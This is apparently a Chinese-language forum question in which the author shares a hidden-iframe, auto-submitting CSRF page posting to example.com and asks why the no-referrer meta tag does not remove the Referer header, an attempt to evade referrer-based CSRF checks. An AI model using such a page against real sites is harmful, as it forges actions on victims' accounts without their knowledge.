我正在制作一个 csrf 脚本
,它将在不发送 referrer
的情况下发送一个 post 请求
。我的代码:
<html>
<body>
<meta name="referrer" content="no-referrer">
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='https://www.example.com/test.php' target="csrf-frame" id="csrf-form">
<input type='hidden' name='x' value='y'>
<input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
</html>
我试图使用这个 meta 标签:
<meta name="referrer" content="no-referrer">
,但是没有成功,在 POST 请求中仍然存在 referrer。